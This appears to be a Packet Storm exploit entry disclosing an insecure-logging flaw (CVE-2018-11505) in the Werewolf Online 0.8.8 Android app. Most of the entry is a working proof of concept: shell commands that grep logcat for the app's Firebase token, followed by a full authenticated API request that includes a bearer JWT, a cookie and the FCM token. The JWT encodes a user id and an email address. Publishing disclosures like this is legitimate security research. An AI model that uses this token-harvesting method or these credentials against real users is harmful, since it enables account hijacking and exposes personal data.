Lucene search

K
packetstormManhNhoPACKETSTORM:147955
HistoryMay 27, 2018 - 12:00 a.m.

Werewolf Online 0.8.8 Information Disclosure

2018-05-2700:00:00
ManhNho
packetstormsecurity.com
26

0.074 Low

EPSS

Percentile

94.1%

`# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging  
# Date: 2018-05-24  
# Software Link:  
https://play.google.com/store/apps/details?id=com.werewolfapps.online  
# Download Link:  
https://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details  
# Exploit Author: ManhNho  
# Version: 0.8.8 Android App  
# CVE: CVE-2018-11505  
# Category: Mobile Apps  
# Tested on: Android 4.4  
  
---Description---  
  
Many developers log information to the android log. Sometimes sensitive  
data as well.  
With output of logcat, Hacker can get "Firebase token" which used in PUT  
request to /players/meAndCheckAppVersion  
  
---PoC---  
  
root@vbox86p:/ # ps | grep 'were'  
u0_a72 9161 205 810364 172268 ffffffff b765ea23 S  
com.werewolfapps.online  
root@vbox86p:/ # logcat | grep -i '9161'  
I/ActivityManager( 586): Start proc com.werewolfapps.online for activity  
com.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,  
3003, 1028, 1015}  
I/MultiDex( 9161): VM with version 1.6.0 does not have multidex support  
I/MultiDex( 9161): Installing application  
...  
D/RNFirebaseMessaging( 9161): Firebase token:  
dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8  
D/RNFirebaseAuth( 9161): getToken/getIdToken  
D/RNFirebaseAuth( 9161): getToken:onComplete:success  
...  
  
Request:  
  
PUT /players/meAndCheckAppVersion HTTP/1.1  
authorization: Bearer  
eyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw  
Content-Type: application/json; charset=utf-8  
Content-Length: 207  
Host: api-core.werewolf-apps.com  
Connection: close  
Accept-Encoding: gzip, deflate  
Cookie:  
AWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3  
User-Agent: okhttp/3.6.0  
  
{"versionNumber":48,"platform":"android","fcmToken":"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8"}  
  
---References---  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505  
https://pastebin.com/NtPn3jB8  
  
`

0.074 Low

EPSS

Percentile

94.1%